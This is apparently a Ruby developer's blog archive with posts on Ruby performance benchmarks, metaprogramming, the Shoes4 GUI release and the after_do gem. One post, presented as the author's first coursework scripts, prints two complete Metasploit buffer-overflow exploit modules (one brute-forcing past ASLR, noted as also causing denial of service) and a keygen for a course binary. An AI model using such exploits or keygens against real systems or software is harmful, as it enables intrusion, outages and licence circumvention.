Category: Ruby

Slides: Ruby to Elixir – what’s great and what you might miss

This is a talk I gave at the Polygot Tech Meetup in Berlin in April. It has parts of my previous elixir talk while adding a new perspective more directly comparing Ruby and Elixir as well as being shorter as it was used as an intro to a fun panel discussion.

Abstract

Elixir and Phoenix are known for their speed, but that’s far from their only benefit. Elixir isn’t just a fast Ruby and Phoenix isn’t just Rails for Elixir. Through pattern matching, immutable data structures and new idioms your programs can not only become faster but more understandable and maintainable. While we look at the upsides we’ll also have a look at what you might be missing and could be improved.

Slides

Don’t you Struct.new(…).new(…)

As I just happened upon it again, I gotta take a moment to talk about one my most despised ruby code patterns: Struct.new(...).new – ever since I happened upon it for the first time.

Struct.new?

Struct.new is a convenient way to create a class with accessors:

2.2.2 :001 > Extend = Struct.new(:start, :length)
 => Extend 
2.2.2 :002 > instance = Extend.new(10, 20)
 => #<struct Extend start=10, length=20> 
2.2.2 :003 > instance.start
 => 10 
2.2.2 :004 > instance.length
 => 20

That’s neat, isn’t it? It is, but like much of Ruby’s power it needs to be wielded with caution.

Where Struct.new goes wrong – the second new

When you do Struct.new you create an anonymous class, another new on it creates an instance of that class. Therefore, Struct.new(...).new(...) creates an anonymous class and creates an instance of it at the same time. This is bad as we create a whole class to create only one instance of it! That is a capital waste.

As a one-off use it might be okay, for instance when you put it in a constant. The sad part is, that this is not the only case I’ve seen it used. As in the first case where I encountered it, I see it used inside of code that is invoked frequently. Some sort of hot loop with calculations where more than one value is needed to represent some result of the calculation. Here programmers sometimes seem to reach for Struct.new(...).new(...).

Why is that bad?

Well it incurs an unnecessary overhead, creating the class every time is unnecessary. Not only that, as far as I understand it also creates new independent entries in the method cache. For JITed implementations (like JRuby) the methods would also be JITed independently. And it gets in the way of profiling, as you see lots of anonymous classes with only 1 to 10 method calls each.

But how bad is that performance hit? I wrote a little benchmark where an instance is created with 2 values and then those 2 values are read one time each. Once with Struct.new(...).new(...), once where the Struct.new(...) is saved in an intermediary constant. For fun and learning I threw in a similar usage with Array and Hash.

Benchmark.ips do |bm|
  bm.report "Struct.new(...).new" do
    value = Struct.new(:start, :end).new(10, 20)
    value.start
    value.end
  end

  SavedStruct = Struct.new(:start, :end)
  bm.report "SavedStruct.new" do
    value = SavedStruct.new(10, 20)
    value.start
    value.end
  end

  bm.report "2 element array" do
    value = [10, 20]
    value.first
    value.last
  end

  bm.report "Hash with 2 keys" do
    value = {start: 10, end: 20}
    value[:start]
    value[:end]
  end

  bm.compare!
end

I ran those benchmarks with CRuby 2.3. And the results, well I was surprised how huge the impact really is. The “new-new” implementation is over 33 times slower than the SavedStruct equivalent. And over 60 times slower than the fastest solution (Array), although that’s also not my preferred solution.

Struct.new(...).new    137.801k (± 3.0%) i/s -    694.375k
SavedStruct.new      4.592M (± 1.7%) i/s -     22.968M
2 element array      7.465M (± 1.4%) i/s -     37.463M
Hash with 2 keys      2.666M (± 1.6%) i/s -     13.418M
Comparison:
2 element array:  7464662.6 i/s
SavedStruct.new:  4592490.5 i/s - 1.63x slower
Hash with 2 keys:  2665601.5 i/s - 2.80x slower
Struct.new(...).new:   137801.1 i/s - 54.17x slower
Benchmark in iterations per second (higher is better)
Benchmark in iterations per second (higher is better)

But that’s not all…

This is not just about performance, though. When people take this “shortcut” they also circumvent one of the hardest problems in programming – Naming. What is that Struct with those values? Do they have any connection at all or were they just smashed together because it seemed convenient at the time. What’s missing is the identification of the core concept that these values represent. Anything that says that this is more than a clump of data with these two values, that performs very poorly.

So, please avoid using Struct.new(...).new(...) – use a better alternative. Don’t recreate a class over and over – give it a name, put it into a constant and enjoy a better understanding of the concepts and increased performance.

Benchmarking a Go AI in Ruby: CRuby vs. Rubinius vs. JRuby vs. Truffle/Graal

The world of Artificial Intelligences is often full of performance questions. How fast can I compute a value? How far can I look ahead in a tree? How many nodes can I traverse?

In Monte Carlo Tree Search one of the most defining questions is “How many simulations can I run per second?”. If you want to learn more about Monte Carlo Tree Search and its application to the board game Go I recommend you the video and slides of my talk about that topic from Rubyconf 2015.

Implementing my own AI – rubykon – in ruby of course isn’t going to get me the fastest implementation ever. It forces you to really do less and therefore make nice performance optimization, though. This isn’t about that either. Here I want to take a look at another question: “How fast can Ruby go?” Ruby is a language with surprisingly many well maintained implementations. Most prominently CRuby, Rubinius, JRuby and the newcomer JRuby + Truffle. How do they perform in this task?

The project

Rubykon is a relatively small project – right now the lib directory has less than 1200 lines of code (which includes a small benchmarking library… more on that later). It has no external runtime dependencies – not even the standard library. So it is very minimalistic and also tuned for performance.

Setup

The benchmarks were run pre the 0.3.0 rubykon version on the 8th of November (sorry writeups always take longer than you think!) with the following concrete ruby versions (versions slightly abbreviated in the rest of the post):

  • CRuby 1.9.3p551
  • CRuby 2.2.3p173
  • Rubinius 2.5.8
  • JRuby 1.7.22
  • JRuby 9.0.3.0
  • JRuby 9.0.3.0 run in server mode and with invoke dynamic enabled (denoted as + id)
  • JRuby + Truffle Graal with master from 2015-11-08 and commit hash fd2c179, running on graalvm-jdk1.8.0

You can find the raw data (performance numbers, concrete version outputs, benchmark results for different board sizes and historic benchmark results) in this file.

This was run on my pretty dated desktop PC (i7 870):


tobi@tobi-desktop ~ $ uname -a
Linux tobi-desktop 3.16.0-38-generic #52~14.04.1-Ubuntu SMP Fri May 8 09:43:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
tobi@tobi-desktop ~ $ java -version
openjdk version "1.8.0_45-internal"
OpenJDK Runtime Environment (build 1.8.0_45-internal-b14)
OpenJDK 64-Bit Server VM (build 25.45-b02, mixed mode)
tobi@tobi-desktop ~ $ lscpu
Architecture:          x86_64
CPU op-mode(s):        32-bit, 64-bit
Byte Order:            Little Endian
CPU(s):                8
On-line CPU(s) list:   0-7
Thread(s) per core:    2
Core(s) per socket:    4
Socket(s):             1
NUMA node(s):          1
Vendor ID:             GenuineIntel
CPU family:            6
Model:                 30
Stepping:              5
CPU MHz:               1200.000
BogoMIPS:              5887.87
Virtualization:        VT-x
L1d cache:             32K
L1i cache:             32K
L2 cache:              256K
L3 cache:              8192K
NUMA node0 CPU(s):     0-7

First benchmark: Simulation + Scoring on 19×19

This benchmark uses benchmark-ips to see how many playouts (simulation + scoring) can be done per second. This is basically the “evaluation function” of the Monte Carlo Method. Here we start with an empty board and then play random valid moves until there are no valid moves anymore and then we score the game. The performance of a MCTS AI is hugely dependent on how fast that can happen.

Benchmarks were run with a warmup time of 60 seconds and a run time of 30 seconds. The small black bars in the graph denote standard deviation. Results:

19_19_ips.png
Full 19×19 playout, iterations per second (higher is better)
Ruby Version iterations per second standard deviation
CRuby 1.9.3p551 44.952 8.90%
CRuby 2.2.3p173 55.403 7.20%
Rubinius 2.5.8 40.911 4.90%
JRuby 1.7.22 63.456 15.80%
JRuby 9.0.3.0 73.479 6.80%
JRuby 9.0.3.0 + invoke dynamic 121.265 14.00%
JRuby + Truffle 192.42 14.00%

JRuby + Truffle runs on a slightly modified version of benchmark-ips. This is done because it is a highly optimizing and speculative runtime that leads to bad results after warmup. This is explained here.

Second benchmark: Full UCT Monte Carlo Tree Search with 1000 playouts

This benchmark does a full Monte Carlo Tree Search, meaning choosing a node to investigate, doing a full simulation and scoring there and then propagating the results back in the tree before starting over again. As the performance is mostly dependent on the playouts the graph looks a lot like the one above.

This uses benchmark-avg, which I wrote myself and (for now) still lives in the rubykon repository. Why a new benchmarking library? In short: I needed something for more “macro” benchmarks that gives nice output like benchmark-ips. Also, I wanted a benchmarking tool that plays nice with Truffle – which means doing warmup and run of a benchmark directly after one another, as detailed in this issue.

This uses a warmup time of 3 minutes and a run time of 2 minutes. Along with the iterations per minute, we have another graph depicting average run time.

19_19_ipm.png
MCTS on 19×19 with 1000 playouts, iterations per minute (higher is better)
19_19_avg.png
MCTS on 19×19 with 1000 playouts, average run time (lower is better)
Ruby Version iterations per minute average time (s) standard deviation
CRuby 1.9.3p551 1.61 37.26 2.23%
CRuby 2.2.3p173 2.72 22.09 1.05%
Rubinius 2.5.8 2.1 28.52 2.59%
JRuby 1.7.22 3.94 15.23 1.61%
JRuby 9.0.3.0 3.7 16.23 2.48%
JRuby 9.0.3.0 + invoke dynamic 7.02 8.55 1.92%
JRuby + Truffle 9.49 6.32 8.33%

Results here pretty much mirror the previous benchmark, although standard deviation is smaller throughout which might be because more non random code execution is involved.

Otherwise the relative performance of the different implementations is more or less the same, with the notable exception of JRuby 1.7 performing better than 9.0 (without invoke dynamic). That could be an oddity, but it is also well within the margin of error for the first benchmark.

For the discussion below I’ll refer to this benchmark, as it ran on the same code for all implementations and has a lower standard deviation overall.

Observations

The most striking observation certainly is JRuby + Truffle/Graal sits atop in the benchmarks with a good margin. It’s not that surprising when you look at previous work done here suggesting speedups of 9x to 45x as compared to CRuby. Here the speedup relative to CRuby is “just” 3.5 which teaches us to always run your own benchmarks.

It is also worth noting that Truffle first was unexpectedly very slow (10 times slower than 1.9) so I opened an issue and reported that somewhat surprising lack in performance. Then Chris Season was quick to fix it and along the way he kept an amazing log of things he did to diagnose and make it faster. If you ever wanted to take a peek into the mind of a Ruby implementer – go ahead and read it!

At the same time I gotta say that the warmup time it takes has got me worried a bit. This is a very small application with one very hot loop (generating the valid moves). It doesn’t even use the standard library. The warmup times are rather huge exactly for Truffle and I made sure to call no other code in benchmark/avg as this might deoptimize everything again. However, it is still in an early stage and I know they are working on it 🙂

Second, “normal” JRuby is faster than CRuby which is not much of a surprise to me – in most benchmarks I do JRuby comes up ~twice as fast CRuby. So when it was only ~30% faster I was actually a bit disappointed, but then remembered the --server -Xcompile.invokedynamic=true switches and enabled them. BOOM! Almost 2.6 times faster than CRuby! Almost 90% faster than JRuby without those switches.

Now you might ask: “Why isn’t this the default?” Well, it was the default. Optimizing takes time and that slows down the startup time, for say rails, significantly which is why it was deactivated by default.

If I’m missing any of these magic switches for any of the other implementations please let me know and I’ll add them.

I’m also a bit sad to see rubinius somewhere between 1.9 and 2.2 performance wise, I had higher hopes for its performance with some appropriate warmup time.

Also opal is notably missing, I couldn’t get it to run but will try again in a next version to see what V8 can optimize here.

An important word of warning to conclude the high level look at the different implementations: These benchmarks are most likely not true for your application! Especially not for rails! Benchmark yourself 🙂

Now for another question that you probably have on your mind: “How fast is this compared to other languages/implementations?” See, that’s hard to answer. No serious Go engine does pure random playouts, they all use some heuristics slowing them down significantly. But, they are still faster. Here’s some data from this computer go thread, they all refer to the 19×19 board size:

  • it is suggested than one should be able to do at least 100 000 playouts per second without heuristics
  • With light playouts Aya did 25 000 playouts in 2008
  • well known C engine pachi does 2000 heavy playouts per thread per second

Which leads us to the question…

Is this the end of the line for Ruby?

No, there are still a couple of improvements that I have in mind that can make it much faster. How much faster? I don’t know. I have this goal of 1000 playouts on 19×19 per second per thread in mind. It’s still way behind other languages, but hey we’re talking about Ruby here 😉

Some possible improvements:

  • Move generation can still be improved a lot, instead of always looking for a new valid random moves a list of valid moves could be kept around, but it’s tricky
  • Scoring can also be done faster by leveraging neighbouring cells, but it’s not the bottleneck (yet)
  • a very clever but less accurate data structure can be used for liberty counting
  • also, of course, actually parallelize it and run on multiple threads
  • I could also use an up to date CPU for a change 😉

Other than that, I’m also looking over to the ruby implementations to get better, optimize more and make it even faster. I have especially high hopes for JRuby and JRuby + Truffle here.

So in the future I’ll try to find out how fast this can actually get, which is a fun ride and has taught me a lot so far already! You should try playing the benchmark game for yourselves 🙂

The not so low cost of calling dynamically defined methods

There are a couple of mantras that exist across programming communities, one of them is to avoid duplication or to keep it DRY. Programming languages equip us with different tools to avoid duplication. In Ruby a popular way to achieve this is Metaprogramming. Methods are dynamically defined to get rid off all duplication and we rejoice – yay! There might be other problems with metaprogrammed solutions, but at least we are sure that the performance is the same as if we’d had written that duplicated code. Or are we?

As the title suggests this post examines the performance of these meta programmed methodsIf you are looking for method definition performance or pure call overhead you’ll find this information in this post by Aaron Patterson.

Before we get into the details I want to quickly highlight that this is not some theoretical micro benchmark I pulled out of thin air. These examples are derived from performance improvements on an actual project. That work was done by my friend Jason R. Clark on this pull request over at Shoes 4. As he doesn’t have time to write it up – I get to, so let’s get to it!

Let’s look at some methods!

(Please be aware that this example is simplified, of course the real code has varying parts most importantly the name of the instance_variable which is the reason why the code was meta programmed in the first place)

class FakeDimension
  def initialize(margin_start)
    @margin_start = margin_start
    @margin_start_relative = relative? @margin_start
  end

  def relative?(result)
    result.is_a?(Float) && result <= 1
  end

  def calculate_relative(result)
    (result * 100).to_i
  end

  define_method :full_meta do
    instance_variable_name = '@' + :margin_start.to_s
    value = instance_variable_get(instance_variable_name)
    value = calculate_relative value if relative? value
    value
  end

  IVAR_NAME = "@margin_start"
  define_method :hoist_ivar_name do
    value = instance_variable_get(IVAR_NAME)
    value = calculate_relative value if relative? value
    value
  end

  define_method :direct_ivar do
    value = @margin_start
    value = calculate_relative value if relative? value
    value
  end

  eval <<-CODE
  def full_string
    value = @margin_start
    value = calculate_relative value if relative? value
    value
  end
  CODE

  def full_direct
    value = @margin_start
    value = calculate_relative value if relative? value
    value
  end
end

Starting at the first define_method these are all more or less the same method. We start at a fully meta programmed version, that even converts a symbol to an instance variable name, and end with the directly defined method without any meta programming. Now with all these methods being so similar you’d expect them all to have roughly the same performance characteristics, right? Well, such is not the case as demonstrated by the following benchmark. I benchmarked these methods both for the case where the value is relative and for when it is not. The results are not too different – see the gist for details. Running the non relative version on CRuby 2.2.2 with benchmark-ips I get the following results (higher is better):

           full_meta      1.840M (± 3.0%) i/s -      9.243M
     hoist_ivar_name      3.147M (± 3.3%) i/s -     15.813M
         direct_ivar      5.288M (± 3.1%) i/s -     26.553M
         full_string      6.034M (± 3.2%) i/s -     30.179M
         full_direct      5.955M (± 3.2%) i/s -     29.807M

Comparison:
         full_string:  6033829.1 i/s
         full_direct:  5954626.6 i/s - 1.01x slower
         direct_ivar:  5288105.5 i/s - 1.14x slower
     hoist_ivar_name:  3146595.7 i/s - 1.92x slower
           full_meta:  1840087.6 i/s - 3.28x slower

And look at that, the full_meta version is over 3 times slower than the directly defined method! Of course direct_ivar is also pretty close, but it’s an unrealistic scenario as the instance variable name is what is really changing. You can interpolate the string of the method definition in the full_string version, though. This achieves results as if the method had been directly defined. But what’s happening here?

It seems that there is a higher than expected cost associated with calling instance_variable_get, creating the necessary string and calling methods defined by define_method overall. If you want to keep the full performance but still alter the code you have to resort to the evil eval and stitch your code together in string interpolation. Yay.

So what, do we all have to eval method definitions for metaprogramming now?

Thankfully no. The performance overhead is constant – if your method does more expensive calculations the overhead diminishes. This is the somewhat rare case of a method that doesn’t do much (even the slowest version can be executed almost 2 Million times per second) but is called a lot. It is one of the core methods when positioning UI objects in Shoes. Obviously we should also do the hard work and try not to call that method that often, we’re working on that and already made some nice progress. But, to quote Jason, “regardless what we do I think that Dimension is bound to always be in our hot path.”.

What about methods that do more though? Let’s take a look at an example where we have an object that has an array set as an instance variable and has a method that concatenates another array and sorts the result (full gist):

class Try

  def initialize(array)
    @array = array
  end

  define_method :meta_concat_sort do |array|
    value = instance_variable_get '@' + :array.to_s
    new_array = value + array
    new_array.sort
  end

  def concat_sort(array)
    new_array = @array + array
    new_array.sort
  end
end

We then benchmark those two methods with the same base array but two differently sized input arrays:

BASE_ARRAY        = [8, 2, 400, -4, 77]
SMALL_INPUT_ARRAY = [1, 88, -7, 2, 133]
BIG_INPUT_ARRAY   = (1..100).to_a.shuffle

What’s the result?

Small input array
Calculating -------------------------------------
    meta_concat_sort    62.808k i/100ms
         concat_sort    86.143k i/100ms
-------------------------------------------------
    meta_concat_sort    869.940k (± 1.4%) i/s -      4.397M
         concat_sort      1.349M (± 2.6%) i/s -      6.805M

Comparison:
         concat_sort:  1348894.9 i/s
    meta_concat_sort:   869940.1 i/s - 1.55x slower

Big input array
Calculating -------------------------------------
    meta_concat_sort    18.872k i/100ms
         concat_sort    20.745k i/100ms
-------------------------------------------------
    meta_concat_sort    205.402k (± 2.7%) i/s -      1.038M
         concat_sort    231.637k (± 2.5%) i/s -      1.162M

Comparison:
         concat_sort:   231636.7 i/s
    meta_concat_sort:   205402.2 i/s - 1.13x slower

With the small input array the dynamically defined method is still over 50% slower than the non meta programmed method! When we have the big input array (100 elements) the meta programmed method is still 13% slower, which I still consider very significant.

I ran these with CRuby 2.2.2, in case you are wondering if this is implementation specific. I ran the same benchmark with JRuby and got comparable results, albeit the fact that JRuby is usually 1.2 to 2 times faster than CRuby, but the slowdowns were about the same.

So in the end, what does it mean? Always benchmark. Don’t blindly optimize calls like these as in the grand scheme of things they might not make a difference. This will only be really important for you if a method gets called a lot. If it is in your library/application, then replacing the meta programmed method definitions might yield surprising performance improvements.

UPDATE 1: Shortly after this post was published coincidentally JRuby 9.0.0.3.0 was released with improvements to the call speed of methods defined by define_method. I added the benchmarks to the comments of the gist. It is 7-15% faster for full_meta and hoist_ivar_name but now the direct_ivar is about as fast as its full_meta and full_string counterparts thanks to the optimizations!

UPDATE 2: I wrote a small benchmark about what I think is the bottle neck here – instance_variable_get. It is missing the slowest case but is still up to 3 times slower than the direct access.

My first ruby script – what was yours?

Can you still remember the first program you ever wrote? The first program you ever wrote in your current favorite language? How far you’ve come and how much you’ve learned since then?

I think it’s important to acknowledge this fact and let people know. Often beginners tell me that they can’t really imagine getting from where they are right now in terms of programming skill to where more experienced people are. Therefore, I think it’s important to show where even experienced developers come from, to give some perspective.

I can’t currently locate the code of the first programs I ever wrote. I exactly know (and still have) my first ruby scripts, though. At that time I was already in the third semester of my bachelor and mostly security focussed in my studies. It was January of 2010 and we had a special task to earn bonus points in the Internet Security course by writing two exploits and a key generator. I decided to use these tasks to learn me some ruby – without reading a book about it or anything. The code is heavily commented, as we had to hand it in and that was one of the requirements.

So here goes the code (unmodified, as handed in). I want to share it to shoe people what horrible unruby-ish code I used to write. I want to encourage you to do the same. Maybe tweet it out with #myfirstrubyscript and a link to a gist or so?

Here is the gist for my first couple of ruby scripts, they are probably easier to read over there as my current blog layout is too narrow: Tobi’s first ruby scripts

The first exploit

The firs exploit was for a service on a provided debian system, that was vulnerable to a buffer overflow. We just had the binary and had to go from there.

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
  #
  # This exploit affects the debian Linuxmachine from our IS Special task.
  #
  include Exploit::Remote::Tcp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Istask11',
      'Description'    => %q{
        This explois was made as part of the Internet Security Special Task.
      },
      'Author'         => 'Tobi',
       'Version'        => '$Revision: 5 $',
      'Payload'        =>
        {
          'Space'    => 1540,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Linux
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Ret'      => 0xbfffef34,
              'BufSize' => 1640  # as found out by debugging/boomerang
            }
          ],
        ],
      'DefaultTarget' => 0))
       
      #set a default port
      register_options(
      [
        Opt::RPORT(9999)
      ],    self.class)
  end
 
 
  #
  # The exploit method connects to the remote service and sends the payload
  # followed by the fake return address and the nullbyte to end the string (otherwise it'd continue reading data which woould be bad
  #
  def exploit
    connect
 
    print_status ("Start exploiting the vulnerable debianmachine")
    #
    # Build the buffer for transmission
    # the Nops after the payload are somehow necessary (didn't work without them), seems like payloads with push would overwrite themselves
    # so I left NOPs which can be written instead of them (for now there are 100 nops, should be more than enough)
    #
    buf = payload.encoded + make_nops(target['BufSize'] - payload.encoded.length) + [target.ret].pack('V') + "\x00"
    print_status("Sending #{buf.length} byte data")
 
    # Send it off
    sock.put(buf)
    sock.get
 
    handler
 
  end
 
end

The second exploit (ASLR)

This time the target was a gentoo machine I believe (despite what the first comment says), and the special problem was that the machine used ASLR – Address Space Layout Randomization. A technique to prevent buffer overflows as the return address changes. My solution to that is error prone and doesn’t always work, but see for yourselves 🙂

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
  #
  # This exploit affects the debian Linuxmachine from our IS Special task.
  # take note of the description as I couldn't find another way in time.
  # possible problem with overloading the process table of gentoo so that afterwards you can't do anything with the shell and it was an excellent DoS-attack....
  #
  include Exploit::Remote::Tcp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Istask12',
      'Description'    => %q{
        This explois was made as part of the Internet Security Special Task.
     you got to watch the exploit on execution time... as soon as you see a dialog spawn (soemnthing out of the ordinary output) you got to press ctrl + C. afterwards
     through session and session -i you can access the shell again. Yes it does not work with really high addresses, sadly. But than it performs an excellent DoS attack (as well as if you don't press ctrl+c).
      },
      'Author'         => 'Tobi',
       'Version'        => '$Revision: 100 $',  
      'Payload'        =>
        {
          'Space'    => 400,  #should be enough for most of the payloads
          'DisableNops' => true, #disabled cause I want to make them manually so I know how many of them i got before the shellcode starts
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Linux
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Ret'      => 0xbf800000, # stack is 8MB big... main shouldn't push that much data on the stack so that we miss out our desired buffer. Plus stack address always starts oxbf (as only 24 byte are randomized)
              'BufSize' => 1032  # as found out by debugging/boomerang
            }
          ],
        ],
      'DefaultTarget' => 0))
       
      #set a default port
      register_options(
      [
        Opt::RPORT(9999)
      ],    self.class)
  end
 
 
  #
  # this time the enemy is secured by ASLR, fortunately not the PaX one. We'll use brute force (which will unfortunately create to many processes for gentoo to handle).
  #
  def exploit
 
    print_status ("Start exploiting the vulnerable gentoomachine")
    #
    # initialization here we determine a couple of important values
    #
    return_address = target.ret
    nops_after_payload = 12 # 4- aligned
    nops_before_payload = target['BufSize'] - payload.encoded.length - nops_after_payload  
    print_status("nops_before_payload: #{nops_before_payload}")
     
    # initialize the constant part of the buffer (for performancereasons)
    standard_buf = make_nops(nops_before_payload) + payload.encoded + make_nops(nops_after_payload )  
     
    # can't be really sure whether the payloadlength is always 4-aligned (at least I don't think so )
    payload_offset = 4- payload.encoded.length % 4
     
 
     
    # as long as we don't reach a region where our buffer can't be we keep on trying.
    while  (return_address < 0xc0000000)  
      connect
      buf = standard_buf + [return_address].pack('V') + "\x00" #building the buffer with the returnaddress we are currently trying (little Endian)
      print_status("trying address #{return_address} ")
      # Send it off
      sock.put(buf)
      sock.get
      handler
      return_address += (nops_before_payload + payload_offset)# incrementing the returnaddress to try new ones (offset to keep 4-aligned
      disconnect
    end
     
     
  end
 
end

The key generator

The last task was considerably easier than the first two tasks, this time we just had a binary and had to generate keys which this binary would accept. In this code you can see me not using constants, but making up for it with using for loops. And probably lots of other terrible things – didn’t want to look at it too closely 😉

# This is my keygen (Tobias Pfeiffer) - I don't need ascii-art like that lame lethal-guitar guy
 
## the numbers as taken from the binary, which are used to XOR encrypt the key  there
encryptnumbers= [0x45, 0x3A ,0xAB, 0xC8 ,0xCC ,0x15 ,0xE3, 0x7A]
 
# at first we create an array of possible encrypted values for each position (of the key), except the last one (key is 9 chars long)
# sicne ruby doesn't really support multidimensional arrays out of the box we got
# to add an array as an element
possencr = Array.new
for i in 0..7 do
  #we're going to temporarily save the found values here
  temparray = []
  for j in 0..255 do
    keychar = j ^ encryptnumbers[i]
    # if keychar is printable
    if ((keychar >= 32) and (keychar <= 126))
      temparray << j
    end
  end
  possencr << temparray
end
 
# in the resulting array, the first index is also the index of the keys/encryptnumbers
# the values stored and accessible with the second array are alle possible encryptedchars (95 each as found out)
# note that the numbers are in order (lowest number comes first)
# now we try to genereate a key
crypt = Array.new # saves the crypted signs we chose (cause we need them to make the sum
key = Array.new # saves the corresponding keychars
sum = 0
 for i in 0..4 do  #just 4 because later on we try to fix things (with the last 3 chars), this part here is pure random
    crypt[i] = possencr[i][rand(possencr[i].length)]
    # key is automotically printable due to our awesome array
    key[i] = crypt[i] ^ encryptnumbers[i]
    sum+= crypt[i]
  end
   
  # so here will be some magice, we'll use our last 3 chars to adjust the sum in  
  # such a way that it's between 97 and 122.
  # we're lucky, as I found out our last 3 possible encrypted chars, have no holes  
  # in the array, it's 95 elements each and all consecutive
  # 109 = (sum+possencr[5][0]+possencr[6][0]+possencr[7][0]+offset)&255 -- that's just something o remind me how I want to calculate things, 109 because it's the middle of 97 and 122
  offset = 109- ((sum+possencr[5][0]+possencr[6][0]+possencr[7][0])&255)  # &255 ---> take the last byte (least significant)
  if offset <0  
    offset = 256 + offset
  end
   
  # we simbly divide our offset equally to all chars, we could have problems with rounding, but we don't since it's a maximum of +-2 and with 109 we got more than enough space
  index = offset/3
  # now make the damned last three chars!
  for i in 5..7 do
    crypt[i] = possencr[i][index]
    key[i] = crypt[i] ^ encryptnumbers[i]
    sum+= crypt[i]
  end
   
  # we just need the last byte
  sum = sum & 255
  key[8] = sum
 
#make them chars (not numbers)
for i in 0..8 do
  key[i]=key[i].chr
end
# make a string out of the array of chars
key = key.to_s
# output the key - BAM!
puts key

How about you?

What was your first ruby script? Can you still find and share it? If so, please tweet it out with #myfirstrubyscript to show that everyone eventually started small 🙂

Video: Shoes talk at JRubyConf 2013

Finally the video of my talk at JRubyConf 2013 in Berlin is online. It was my first full length talk at a conference, I gave it almost a year ago – some difficulties with the video material and getting it online caused this delay. Nonetheless it is finally here! The talk was titled “Shoes – the Ruby Way to GUI applications” and now  you can go ahead and watch it or you can watch all the other amazing talks.

While that is a bit old, some of the information isn’t up to date anymore. Most importantly about what still needs to be implemented as we made tremendous progress so far. We have a preview release and are happily looking into the future 🙂

Shoes4 preview – the more personal release notes

As you might have noticed a big project I’ve been working on for almost 2 years got its first release on the 10th of May a bit more than 2 weeks ago. You can go read the official release announcement. This one is a bit more personal 😉

JAY A RELEASE!!!!

It’s been a long road from the 24th of May 2012 when the shoes community got together to concentrate efforts on the complete rewrite we call shoes4 now. That is a long time. It’s a time in which we made more than 2000 commits and closed nearly 600 issues.

Why did it take us so long? Well rewrites are difficult… there is an older piece of software in place which kind of does what you want but not really. Still if you release your new version has to be somewhat good enough. With this preview release we feel that all the major building blocks of the Shoes DSL itself are in place. Finally.

This release is really important to me. You know, it’s super hard to work on a project for so long without any release. Without any users. Other than your co-contributors there really aren’t many playing with what you build. Not many people to report bugs. Not many people to build something awesome. Not many people telling you that what you do actually matters. Sometimes this makes it a bit hard to motivate yourself. Therefore I want to thank everyone who during that time encouraged anyone of us, wrote an email saying that shoes is awesome or even grabbed a release straight from github and tried it out. Every time that happened it put a big smile on my face and motivated me to put in a couple of hours of extra work. I you!

Hackers gonna hack

Of course a release doesn’t mean that people are really using what you build. I tried to make a little effort writing the announcement blog post and sending out some announcement emails. So far we have a bit over 260 gem downloads, which is good I guess 🙂 There will hopefully be a wider coverage if we get a release out.

Of course, this is just  preview release. Nothing stable. We’re hard at work and already got some nice new bug fixes and improvements lined up. Stay tuned for the preview2 release and subsequent releases until we hit a release candidate!

Thanks

Last but not least I want to thank everyone who ever contributed to shoes4 – not only code but reporting issues, just trying stuff out. Thank you really, your support means a lot! Also to whoever funds me or funded me on gittip – thank you!

More personalized thanks go out to Eric Watson and Jason R. Clark! Eric has probably been the most steady contributor to shoes4. He’s been there from the start, still is, still going strong. And hopefully will for a long time 🙂 Recently he’s been hard at work converting our specs to the rspec3 syntax. Jason on the other hand is a more recent addition to the team – his first commits date back to around September 2013. Nevertheless he’s been pretty hard at work solving vital issues and hard to crack bugs. Lately he’s been hunting down operating system handles we didn’t free up!

What impresses me most about the two of them is that they both have a family and a job but still find the time to work on open source. I hope I’ll be the same once I’m at that point in my life! I mean Eric even has 5 children! FIVE! I can’t even imagine what that’s like 🙂 . But that’s super fun too. I’ll never forget remote pair programming with him with one of his kids running around in the background and waiving. Or Jason attributing the first open source contribution of his daughter on shoes. All super fun memories.

So everybody, shoes is coming. Try the preview release. Or wait for the next one. Or the release candidate. No matter what. Shoes is coming!

Shoes on!

Tobi

after_do 0.3.0 released

I just released version 0.3.0 of my little aspect oriented programming/adding callbacks to methods library after_do! You can find an introduction here.

So what is in 0.3.0? Basically 2 things:

  • after_do now works properly with modules, meaning you can attach callbacks to the methods of a module and objects of classes including those methods will call them!
  • Fixed bugs around inheritance where it could happen that a block might get called too often or not at all

At the same time this release was able to delete code and remove complexity while improving functionality. How is that possible? Well thanks to block scoping it is!

One problem I always had is to figure out callbacks of which class to execute in combination with inheritance. You know – self is always the current object and callbacks might be defined in super classes. I wanted to have a way to know which class the currently called method is defined in, not what the class of the current object is. Luckily there is one point where I know that – the moment when I add the callbacks (since they are added on that exact class/module). So we just need to save it:

callback_klazz = self
define_method method do |*args|
  callback_klazz.send(:_after_do_execute_callbacks, :before, method, self, *args)
  return_value = send(alias_name, *args)
  callback_klazz.send(:_after_do_execute_callbacks, :after, method, self, *args)
  return_value
end

Simple yet powerful.

Enjoy the 0.3 release of after_do 🙂

Introducing after_do: after/before method callbacks in Ruby

I want to introduce you to a little gem I built and use in some of my projects: after_do. What it does is pretty simple: you can attach callback blocks before/after methods are executed. And it looks like this:


MyClass.after :some_method do whatever_you_want end
# or/and
MyClass.before :some_method do pure_magic end

As I don’t fancy monkeypatching you will have to extend classes that you want to use after_do on with the AfterDo module. E.g. for the code above to work:

MyClass.extend AfterDo

after_do has no external runtime dependencies and the code is around 160 lines (blank lines and documentation included) with lots of small methods. So simplecov reports there are a little above 70 relevant lines code (it ignores blank lines, docs etc.).

It works and is tested with current releases of all major ruby interpreters, e.g. MRI (1.9.3 and 2.0), JRuby and rubinius.

The github repo has some more documentation about use cases etc. – I won’t go into all of it here.

Why would I want to do that?

For me this catches the essence of Aspect Oriented Programming – doing something before or after a method is executed to fight cross-cutting concerns. What are these cross-cutting concerns? Glad you asked! They are aspects of your application that you can’t confine to a single class but are rather spread over multiple classes.

One of the most common examples is logging: Logging is done in many classes and many methods. As a result the real purpose of a method is cluttered with logging statements and it’s hard to get an overview of all the logging statements in your application at once.
